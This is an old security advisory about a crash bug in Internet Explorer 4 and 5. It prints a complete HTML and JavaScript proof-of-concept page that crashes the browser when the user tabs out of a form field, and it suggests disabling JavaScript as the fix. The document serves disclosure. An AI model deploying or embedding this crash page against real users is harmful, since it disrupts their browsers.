COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE 4, 5

PROBLEM

    Thomas Reinke  found following.   It is  possible to  crash  IE4/5
    using a bit of  dynamic HTML.  The  specifics of the setup  are as
    follows.  A page uses frames  to host JavaScript code on the  main
    page,  and  uses  a  "main"  subframe to display rendered contents
    calculated by  the JavaScript  code.   In addition,  the displayed
    page has  event handlers  on various  actions that  could be cause
    for the page to be redrawn, by executing a function in the  parent
    frame.  So, if we use an "onChange" event handler in a text  input
    box,  and  the  user  enters  data  and  TABS  out of the box, the
    onChange event handler is invoked.   If the event handler  redraws
    the page, IE  will crash.   Note that if  you change the  data and
    then CLICK  on the  page, the  event handler  is also invoked, the
    page  is  redrawn,  but  the  browser  does  not crash.  A working
    version of the bug can be found at:

        http://www.e-softinc.com/iebug_001.html

    A copy of the HTML code is  shown below.  The bug has been  tested
    to  work  on  Windows  NT  IE  5.00.2314.1003,  and  Windows 95 IE
    4.72.3110.8

    <HTML>
    <HEAD>
    <SCRIPT LANGUAGE="JavaScript">
    
    function blank() {
      return "<HTML></HTML>"
    }
    
    function blank2() {
      return "<HTML><BODY onload='parent.paintme()'></BODY></HTML>"
    }
    
    function paintme() {
       main.document.write(rewrite());
       main.document.close();
    }
    
    function rewrite() {
    var ns = '<HTML> \r\n\
    <HEAD> \r\n\
    <title>Buy Investments</title> \r\n\
    </HEAD> \r\n\
    <BODY>\r\n\
    To crash your browser (if you are running IE), enter a value in the\r\n\
    first field and press <TAB> (which would normally move you to the\r\n\
    second field).\r\n\
    <P>\r\n\
    <FORM name=dummy>\r\n\
    <TABLE>\r\n\
        <TR>\r\n\
            <TD align=right>A text field</td>\r\n\
            <TD><INPUT TYPE=text name=number
    onChange="parent.paintme()"></td>\r\n\
        </TR>\r\n\
        <TR>\r\n\
            <TD align=right>A dummy field we want to tab to:</td>\r\n\
            <TD><INPUT TYPE=text name=number2></td>\r\n\
        </TR>\r\n\
    </table>\r\n\
    </FORM>\r\n\
    </BODY>\r\n\
    </HTML>'
    
    return ns
    }
    </SCRIPT>
    </HEAD>
    <FRAMESET ROWS="1,*" FRAMEBORDER=0 FRAMESPACING=0>
        <FRAME NAME="blank" SCROLLING=NO SRC="javascript:parent.blank()">
        <FRAME NAME="main" SRC="javascript:parent.blank2()">
    </FRAMESET>
    </HTML>

SOLUTION
    
    Disable javascript.